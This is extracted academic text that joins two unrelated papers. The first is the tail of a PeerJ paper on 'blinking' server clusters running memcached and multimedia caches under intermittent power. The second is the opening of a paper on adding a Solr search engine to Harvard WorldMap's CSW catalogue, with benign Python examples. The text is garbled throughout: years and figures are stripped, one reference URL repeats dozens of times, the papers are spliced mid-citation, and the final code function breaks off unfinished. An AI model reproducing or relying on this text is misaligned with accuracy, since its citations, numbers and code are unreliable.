blinking introduces regulated churn into data center applications as nodes switch from the active to inactive state. churn has been well-studied in decentralized, self-organizing distributed hash tables (stoica et al., ). however, the type of churn experienced by dhts is different than the churn caused by blinking, which motivates our different approach to the problem. in the former case, nodes arrive and depart unexpectedly based on autonomous user behavior and network conditions, while in the latter case, nodes switch between the active and inactive states in a regular and controllable fashion. ramcloud (ousterhout et al., ) proposes using memory for low-latency persistent storage, and cites as motivation the increasingly large memcached clusters used in production data centers. the use of caches to improve the performance of multimedia distribution systems has been studied extensively in the past two decades. tang, xu & chanson ( ) gives a general overview on existing multimedia caching techniques. due to the vast amount of exiting work in this area, we only focus on the work closely related to our approach, although, to the best of our knowledge, there is no existing work that directly addresses multimedia caches for intermittent power. wu, yu & wolf ( ) were among the first to propose the caching of chunks (segments) of a video. in contrast to our approach chunks are not equal in size and increase exponentially with the distance from the start of the video. the intention of this approach is to combine the number of consecutive chunks that are cached with the popularity of the video. e.g., for a very popular video all chunks would be stored on the cache while for less popular chunks only a certain number of the initial chunks of the video would be cached. letting the chunk size grow exponentially has the advantage that the initial chunks of many videos can be stored without occupying too much of the caches storage space. having only one or several initial chunks of a video stored on the cache bears the advantage that a requested video can be streamed to the client and played out without significant delay. missing chunks can be streamed from the server immediately after the initial client request to allow for a smooth play out. in contrast to the approach presented by wu et al., we decided for a scheme that splits all videos in equal sized chunks (except for the very last chunk) where the complete chunk can be transmitted to the client in a period that is equal or smaller than the blink interval, assuming a minimum transmission rate. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a more restrictive version of the caching of video chunks is the caching of the first chunk (prefix) only, which was introduced by sen, rexford & towsley ( ). the sole goal of this approach is to reduce the buffer time at the client, since the first chunk can be streamed from the cache much faster than from a remote server. our initial work on prefix prefetching of videos listed on youtube’s related video list (khemmarart et al., ) is based on this approach, but proactively prefetches prefixes instead of caching them. as we have shown in khemmarart et al. ( ), prefix prefetching can significantly improve the viewer’s experience of watching videos and this motivated us to investigate how the prefetching approach performs on a multimedia cache for intermittent power. 
the results presented above show that prefix prefetching can improve the experience of a viewer also in the case of a blinking multimedia cache. as in our current work, trace-based driven simulations are also used in cha et al. ( ) and zink et al. ( ) to investigate the effectiveness of caching for youtube videos. both investigations show that caching of youtube video can both, on a global and regional level, reduce server and network load significantly. in contrast to the work presented in this paper, both studies do not consider scenarios in which power for the caches is intermittent. applicability of blinking while we apply blinking to two distributed applications in this paper, we believe blinking is applicable to other applications with intermittent power constraints. there are a range of scenarios beyond renewable energy where imposing intermittent constraints may be attractive. for example, data centers may wish to participate in automated demand-response programs with the electric grid. automated demand-response, which is a cornerstone of a future smart electric grid, decreases power levels at participating consumers when the electric grid is under stress in exchange for lower power rates. data centers are well-positioned to benefit from automated demand-response, since servers, as opposed to other types of electrical appliances, already include sophisticated power management mechanisms and are remotely programmable. blink simply uses these pre-existing mechanisms to gracefully scale application performance as power varies. additionally, data centers consume significant quantities of power, and demand-response programs typically target large power consumers first. thus, addressing intermittent constraints in data centers may contribute to a more flexible and efficient electric grid. in addition to automated demand-response programs, data center operators may wish to cap energy bills or power consumption at a fixed level for a variety of reasons, which also imposes intermittent power constraints. for instance, capping energy bills imposes variable power constraints when energy prices vary, as with wholesale energy prices which vary at intervals as low as every min (qureshi et al., ). thus, as market prices vary, the amount of power a fixed budget purchases will also vary. capping power is also necessary during “brownout” scenarios, more common in developing countries, where the electric grid is not always able to fully meet demand. further, ranganathan et al. ( ), as well as others (fan, weber & barroso, b), point out the benefits of oversubscribing a data sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. center’s power delivery infrastructure, including the possibility of using dense clusters of lower-cost, but higher-power, components and then capping power to prevent damage. finally, we believe blinking is applicable to applications beyond memcached and multimedia cache. as with caches, applying blinking will likely require application-level modifications to handle regular and periodic disconnections. one particularly interesting case is leveraging blinking to run distributed storage systems under intermittent power constraints, such as in “brownout” scenarios. persistent storage presents a different problem than caches, since there is not an alternative always-on option to fallback on to retrieve data. 
while we measure the performance of distributed caches primarily as a function of hit rate, a blinking storage system’s performance is primarily a measure of data availability, including both the latency and throughput to access data. as a result, a blinking storage system may need to judiciously replicate data to increase availability and ensure consistency across replicas, despite regular and frequent node transitions between the active and inactive states. conclusion in this paper, we focus on managing server clusters running on intermittent power. we propose blinking as the primary abstraction for handling intermittent power constraints, and define multiple types of blinking policies. we then design an application-independent platform for developing and evaluating blinking applications, and use it to perform an in-depth study of the effects of blinking on two distributed applications—memcached and multimedia cache—for various power signals. we find that while an activation policy with key migration results in the best hit rates, it does not distribute the benefits of the cache equally among equally popular objects. as in-memory caches continue grow in size, they will store a greater fraction of equally popular objects for zipf-like object popularity distributions. we propose and evaluate an asymmetric load-proportional policy to increase fairness without significantly sacrificing the cache’s hit rate. we then propose a staggered load-proportional policy that staggers the start time of servers to maximize the availability of at least one active server. staggering the start time in conjunction with first chunk replication improves the performance of a multimedia cache, but it does not improve that of memcached because it is a key-value storage system and, unlike the multimedia cache, it does not stream data. we are currently studying how blinking applies to other types of data center applications, including distributed storage layers and data-intensive batch systems. additional information and declarations funding this research was supported in part by nsf grants cns- , cns- , eec- , cns- , and cns- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: nsf: cns- , cns- , eec- , cns- , cns- . competing interests prashant shenoy is an academic editor for peerj computer science. dilip krishnappa is an employee of akamai technologies. author contributions • navin sharma conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • dilip krishnappa and sean barker conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • david irwin and prashant shenoy conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the research in this article did not generate any raw data. references agarwal y, hodges s, chandra r, scott j, bahl p, gupta r. . somniloquy: augmenting network interfaces to reduce pc energy usage. 
in: proceedings of the conference on networked systems design and implementation. berkeley: usenix.
ahmad f, vijaykumar t. joint optimization of idle and cooling power in data centers while maintaining response time. in: proceedings of the conference on architectural support for programming languages and operating systems. new york: acm.
anderson d, franklin j, kaminsky m, phanishayee a, tan l, vasudevan v. fawn: a fast array of wimpy nodes. in: proceedings of the symposium on operating systems principles. new york: acm.
balshe w. power system considerations for cell tower applications. available at http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf.
barroso l, hölzle u. the case for energy-proportional computing. computer. doi . /mc. .
breslau l, cao p, fan l, phillips g, shenker s. web caching and zipf-like distributions: evidence and implications. in: proceedings of the international conference on computer communications. piscataway: ieee.
cha m, kwak h, rodriguez p, ahn y, moon s. i tube, you tube, everybody tubes: analyzing the world's largest user generated content video system. in: imc. new york: acm. available at http://an.kaist.ac.kr/traces/papers/imc -cha.pdf.
chase j, anderson d, thakar p, vahdat a, doyle r. managing energy and server resources in hosting centres. in: proceedings of the symposium on operating systems principles. new york: acm.
-cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf 
http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf 
http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://www.cumminspower.com/www/literature/technicalpapers/pt- -cell-tower-applications-en.pdf http://dx.doi.org/ . /mc. . http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://an.kaist.ac.kr/traces/papers/imc -cha.pdf http://dx.doi.org/ . /peerj-cs. cohen i, chase j, goldszmidt m, kelly t, symons j. . correlating instrumentation data to system states: a building block for automated diagnosis and control. in: proceedings of the symposium on operating system design and implementation. berkeley: usenix, – . decandia g, hastorun d, jampani m, kakulapati g, lakshman a, pilchin a, sivasubrama- nian s, vosshall p, vogels w. . dynamo: amazon’s highly available key-value store. in: proceedings of the symposium on operating systems principles. new york: acm, – . elevate energy. . dynamic pricing and smart grid. available at http://www.cntenergy.org/ pricing. endace. . endace dag network monitoring interface. available at http://www.endace.com/. erman j, gerber a, ramadrishnan kk, sen s, spatscheck o. . over the top video: the gorilla in cellular networks. 
in: proceedings of the acm sigcomm conference on internet measurement conference, imc ’ . new york: acm, – . fan x, weber w, barroso l. a. power provisioning for a warehouse-sized computer. in: proceedings of the acm international symposium on computer architecture. new york: acm. fan x, weber w, barroso l. b. power provisioning for a warehouse-sized computer. in: proceedings of the acm international symposium on computer architecture. new york, piscataway: acm, ieee, – . fan k, zheng z, sinha p. . steady and fair rate allocation for rechargeable sensors in perpetual sensor networks. in: proceedings of the conference on embedded networked sensor systems. new york: acm, – . gandhi a, harchol-balter m, das r, kephart j, lefurgy c. . power capping via forced idleness. in: proceedings of the workshop on energy-efficient design. new york: acm. guay j. . india: forget the grid, community power is here. available at http://ourworld.unu. edu/en/india-forget-the-grid-community-power-is-here/. gupta p. . google to use wind energy to power data centers. reuteurs. available at http:// www.reuters.com/article/us-google-windpower-idustre j bl . hamilton j. . overall data center costs. available at http://perspectives.mvdirona.com/. khemmarart s, zhou r, gao l, zink m. . watching user generated videos with prefetching. in: mmsys. new york: acm, – . kontorinis v, zhang l, aksanli b, sampson j, homayoun h, pettis e, tullsen d, rosing t. . managing distributed ups energy for effective power capping in data centers. in: international symposium on computer architecture (isca). new york: acm, – . krioukov a, mohan p, alspaugh s, keys l, culler d, katz r. . napsac: design and implementation of a power-proportional web cluster. in: proceedings of the workshop on green networking. new york: acm. lee k, bilgir o, bianchini r, martonosi m, nguyen t. . managing the cost, energy consumption, and carbon footprint of internet services. in: proceedings of the sigmetrics conference. new york: acm. le sueur e, heiser g. . dynamic voltage and frequency scaling: the laws of diminishing returns. in: proceedings of the workshop on power aware computing and systems. berkeley: usenix. meisner d, gold b, wenisch t. . powernap: eliminating server idle power. in: proceedings of the conference on architectural support for programming languages and operating systems. new york: acm, – . sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. 
enhancing discovery in spatial data infrastructures using a search engine

paolo corti, athanasios tom kralidis and benjamin lewis
center for geographic analysis, harvard university, cambridge, ma, usa
open source geospatial foundation, beaverton, or, usa

abstract
a spatial data infrastructure (sdi) is a framework of geospatial data, metadata, users and tools intended to provide an efficient and flexible way to use spatial information. one of the key software components of an sdi is the catalogue service, which is needed to discover, query and manage the metadata. catalogue services in an sdi are typically based on the open geospatial consortium (ogc) catalogue service for the web (csw) standard, which defines common interfaces for accessing the metadata information. a search engine is a software system capable of supporting fast and reliable search, which may use 'any means necessary' to get users to the resources they need quickly and efficiently. these techniques may include full-text search, natural language processing, weighted results, fuzzy-tolerant matching, faceting, hit highlighting, recommendations and many others. in this paper we present an example of a search engine being added to an sdi to improve search against large collections of geospatial datasets. the center for geographic analysis (cga) at harvard university re-engineered the search component of its public domain sdi (harvard worldmap), which is based on the geonode platform. a search engine was added to the sdi stack to enhance the csw catalogue discovery abilities. it is now possible to discover spatial datasets from metadata by using the standard search operations of the catalogue and to take advantage of the new abilities of the search engine to return relevant and reliable content to sdi users.

subjects human-computer interaction, spatial and geographic information systems
keywords data discovery, catalogue service for the web, metadata, worldmap, geoportal, search engine, spatial data infrastructure, pycsw, solr, geonode

introduction
a spatial data infrastructure (sdi) typically stores a large collection of metadata. while the open geospatial consortium (ogc) recommends the use of the catalogue service for the web (csw) standard to query these metadata, several important benefits can be obtained by pairing the csw with a search engine platform within the sdi software stack.

sdi, interoperability, and standards
an sdi is a framework of geospatial data, metadata, users and tools which provides a mechanism for publishing and updating geospatial information.
an sdi provides the architectural underpinnings for the discovery, evaluation and use of geospatial information (nebert, ; goodchild, fu & rich, ; masó, pons & zabala, ). sdis are typically distributed in nature, and connected by disparate computing platforms and client/server design patterns.
a critical principle of an sdi is interoperability, which can be defined as the ability of a system, or of components in a system, to provide information sharing and inter-application cooperative process control through a mutual understanding of request and response mechanisms embodied in standards. standards (formal, de facto, community) provide three primary benefits for geospatial information: (a) portability: use and reuse of information and applications; (b) interoperability: multiple system information exchange; and (c) maintainability: long term updating and effective use of a resource (groot & mclaughlin, ). the ogc standards baseline has traditionally provided core standards definitions to major sdi activities. along with other standards bodies (ietf, iso, oasis) and de facto/community efforts (open source geospatial foundation (osgeo), etc.), ogc standards provide broadly accepted, mature specifications, profiles and best practices (kralidis, ).
metadata search in an sdi and csw
an sdi can contain a large number of geospatial datasets, which may grow in number over time. the difficulty of finding a needle in such a haystack means a more effective metadata search mechanism is called for. metadata are data about data: they describe the content, quality, condition and other characteristics of data in order to ease the search and understanding of data (nogueras-iso, zarazaga-soria & muro-medrano, ). metadata standards define a way to provide homogeneous information about the identification, the extent, the spatial and temporal aspects, the content, the spatial reference, the portrayal, distribution and other properties of digital geographic data and services (iso - : , ). ease of data discovery is a critical measure of the effectiveness of an sdi. the ogc csw standard specifies the interfaces and bindings, as well as a framework for defining the application profiles, required to publish and access digital catalogues of metadata for geospatial data and services (open geospatial consortium, ; nebert, whiteside & vretanos, ; rajabifard, kalantari & binns, ). based on the dublin core metadata information model, csw supports broad interoperability around discovering geospatial data and services spatially, non-spatially, temporally, and via keywords or free text.
csw supports application profiles, which allow information communities to constrain and/or extend the csw specification to satisfy specific discovery requirements and to realize tighter coupling and integration of geospatial data and services. the csw iso application profile is an example of a standard for geospatial data search which follows the iso geospatial metadata standards.
csw catalogue within the sdi architecture
in a typical sdi architecture the following components can be identified:
- gis clients: desktop gis tools or web based viewers.
- spatial data server: returns geospatial data to map clients in a range of formats.
- cache data server: returns cached tiles to map clients to improve performance.
- processing server: responsible for the processing of the geospatial datasets.
- spatial repository: a combination of a spatial database and file system, where the geospatial data is stored.
- catalogue server: used by map clients to query the metadata of the spatial datasets to support discovery.
desktop gis clients generally access the sdi data directly from the spatial repository or the file system. when the user has appropriate permissions, it is possible from these clients to perform advanced operations, which are generally faster than when performed over ogc web standards. web based viewers access the sdi data served by the spatial data server using a number of ogc web standards over http: typically wms/wmts/wms-c when the data only needs to be rendered, or wfs/wcs when access to the native information is needed, for vector or coverage datasets respectively. wfs-t can be used for editing vector datasets. web viewers can run gis sdi processes by using the wps standard exposed by the processing server. all of these ogc standards can be used by desktop gis clients as well. the spatial repository is generally a combination of an rdbms with a spatial extension and the file system, where data not kept in the database are stored. the catalogue, based on the csw standard, lets users discover data and services in an sdi. csw is a standard for exposing a catalogue of geospatial entities over the http request/response cycle. in an sdi or portal, csw endpoints are provided by a csw catalogue. popular open source implementations of csw catalogues include (but are not limited to) pycsw (http://pycsw.org/), geonetwork (https://geonetwork-opensource.org/), deegree (https://www.deegree.org/) and esri geoportal server (https://www.esri.com/en-us/arcgis/products/geoportal-server/overview). a csw catalogue implements a number of operations which are accessible via http; some of these operations are optional:
- getcapabilities: retrieves service metadata from the server.
- describerecord: allows a client to discover the data model of a specific catalogue information model.
- getrecords: searches for records using a series of criteria, which can be spatial, aspatial, logical or comparative.
- getrecordbyid: retrieves metadata for one record (layer) of the catalogue by its id.
- getdomain (optional): retrieves runtime information about the range of values of a metadata record element or request parameter.
- harvest (optional): creates or updates metadata with a request to the server to 'pull' metadata from some endpoint.
- transaction (optional): creates or edits metadata with a request to the server.
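as a concrete illustration of how a client exercises these operations, here is a minimal sketch using the owslib python client (an assumption of this sketch; the paper does not prescribe a client) to issue a getrecords request against a csw endpoint. the endpoint url and search term are placeholders.

```python
from owslib.csw import CatalogueServiceWeb
from owslib.fes import PropertyIsLike

# connect to a CSW endpoint (placeholder URL; pycsw, GeoNetwork and others expose this interface)
csw = CatalogueServiceWeb("https://example.org/csw")

# the GetCapabilities response, fetched on connection, lists the operations the server supports
print([op.name for op in csw.operations])

# GetRecords with a full-text constraint against any queryable text field
anytext = PropertyIsLike("csw:AnyText", "%flood%")
csw.getrecords2(constraints=[anytext], maxrecords=10, esn="summary")

for record_id, record in csw.records.items():
    # each result is a Dublin Core record exposing title, abstract, keywords, bounding box, ...
    print(record_id, record.title)
```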
need for a search engine within an sdi
search workflow and user experience are a vital part of modern web-based applications. numerous types of web application, such as content management systems (cms), wikis and data delivery frameworks, can all benefit from improved data discovery, and the same applies to an sdi. furthermore, in the big data era, more powerful mechanisms are needed to return relevant content to the users from very large collections of data (tsinaraki & schade, ). in the last few years, content-driven platforms have delegated the task of search optimization to specific frameworks known as search engines. rather than implementing a custom search logic, these platforms now often add a search engine to the stack to improve search. apache solr (http://lucene.apache.org/solr/) and elasticsearch (https://www.elastic.co/), two popular open source search engine web platforms, both based on apache lucene (https://lucene.apache.org/), are commonly used in typical web application stacks to support complex search criteria, faceting, results highlighting, query spell-check, relevance tuning and more (smiley et al., ). as with cmss, sdi search can dramatically benefit from such platforms as well.
how a search engine works
typically the way a search engine works can be split into two distinct phases: indexing and searching. during the indexing phase, all of the documents (metadata, in the sdi context) that must be searched are scanned, and a list of search terms (an index) is built. for each search term, the index keeps track of the identifiers of the documents that contain the search term. during the searching phase only the index is looked at, and a list of the documents containing the given search term is quickly returned to the client. this indexed approach makes a search engine extremely fast in outputting results. on top of this, a search engine provides many other useful search-related features, dramatically improving the experience of users.
improvements in an sdi with a search engine
there are numerous opportunities to enhance the functionality of the csw specification and subsequent server implementations by specifying standard search engine functionality as enhancements to the standard. a search engine is extremely fast and scalable: by building and maintaining its indexed structure of the content, it can return results much faster and scale much better than a traditional csw based on a relational database. while a csw can search metadata with a full text approach, with a search engine it is possible to extend the full text search with features such as language stemming, thesaurus and synonyms, hit highlighting, wild-card matches and other 'fuzzy' matching techniques. another key advantage is that search engines can provide relevancy scores for likely matches, allowing for much finer tuning of search results. csw does not easily emit facets or facet counts as part of search results. search engine facets, however, can be based on numerous classification schemes, such as named geography, date and time extent, keywords, etc., and can be used to enable interactive feedback mechanisms which help users define and refine their searches effectively.
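to make the indexing and searching phases described above concrete, here is a toy, self-contained python sketch of an inverted index over metadata records; it only illustrates the idea, not how solr or elasticsearch are implemented internally.

```python
from collections import defaultdict

# a handful of toy metadata records (identifier -> text)
records = {
    "layer-1": "land cover map of the amazon basin",
    "layer-2": "population density and land use in europe",
    "layer-3": "river flood extent, amazon, 2009",
}

# indexing phase: scan every record once and map each term to the record ids containing it
index = defaultdict(set)
for record_id, text in records.items():
    for term in text.lower().split():
        index[term.strip(",.")].add(record_id)

# searching phase: only the index is consulted, so lookups stay fast as the collection grows
def search(term):
    return sorted(index.get(term.lower(), set()))

print(search("amazon"))  # ['layer-1', 'layer-3']
print(search("flood"))   # ['layer-3']
```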
background
harvard worldmap (http://worldmap.harvard.edu/) is an open source sdi and geospatial content management system (geocms) platform developed by the center for geographic analysis (cga) to lower the barrier for scholars who wish to explore, visualize, edit and publish geospatial information (guan et al., ). registered users are able to upload geospatial content, in the form of vector or raster datasets (layers), and combine them with existing layers to create maps. existing layers can be layers uploaded by other users and layers provided by external map services. worldmap is a web application built on top of the geonode open source mapping platform (http://geonode.org/), and since has been used by more than , registered users to upload about , layers and to create some , web maps. users can also access about , layers from remote map services based on ogc standards and esri rest protocols. worldmap is based on the following components, all open source and designed around ogc standards (fig. ):
- a javascript web gis client, geoexplorer (http://suite.boundlessgeo.com/docs/latest/), based on openlayers (https://openlayers.org/) and extjs (https://www.sencha.com/products/extjs/).
- a spatial data server based on geoserver (http://geoserver.org/).
- a cache data server based on geowebcache (http://geowebcache.org/).
- a spatial database implemented with postgresql (https://www.postgresql.org/) and postgis (https://postgis.net/).
- a catalogue based on pycsw or geonetwork.
- a web application, developed with django (https://www.djangoproject.com/), a python web framework, which orchestrates all of the previous components.
figure : the worldmap sdi architecture.
worldmap allows users to build maps using its internal catalogue of layers (local layers) combined with layers from external map services (remote layers), for a total of about , layers. worldmap users can have trouble finding useful and reliable layers given the large number of them; a system was needed to enable fast, scalable search capable of returning the most reliable and useful layers within a large and heterogeneous collection.
results and discussion
in , cga started the design and development of hypermap registry (hypermap) (https://github.com/cga-harvard/hypermap-registry) to improve search for worldmap users. hypermap is an application that manages ogc web services (such as wms, wmts and csw capabilities service metadata) as well as esri rest endpoints. in addition it supports map service discovery (chen et al., ), crawling (bone et al., ; li, yang & yang, ), harvesting and uptime statistics gathering for services and layers. one of the main purposes of hypermap is to bring enhanced search engine capabilities into an sdi architecture. as can be seen in fig. , search engine documents, based on a provided schema, must be kept in synchrony with layer metadata stored in the geonode rdbms.
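a rough, hypothetical sketch of what such a synchronization step could look like is shown below: a layer's metadata row is read from the relational database and pushed as a document to solr's update endpoint. the table, field and core names are illustrative only; the actual hypermap implementation, described next, routes this work through a task queue.

```python
import json
import requests
import psycopg2

SOLR_UPDATE_URL = "http://localhost:8983/solr/hypermap/update"  # illustrative core name

def sync_layer_to_solr(layer_id):
    """read one layer's metadata from the rdbms and upsert it as a search engine document."""
    conn = psycopg2.connect(dbname="worldmap")  # connection details are placeholders
    with conn, conn.cursor() as cur:
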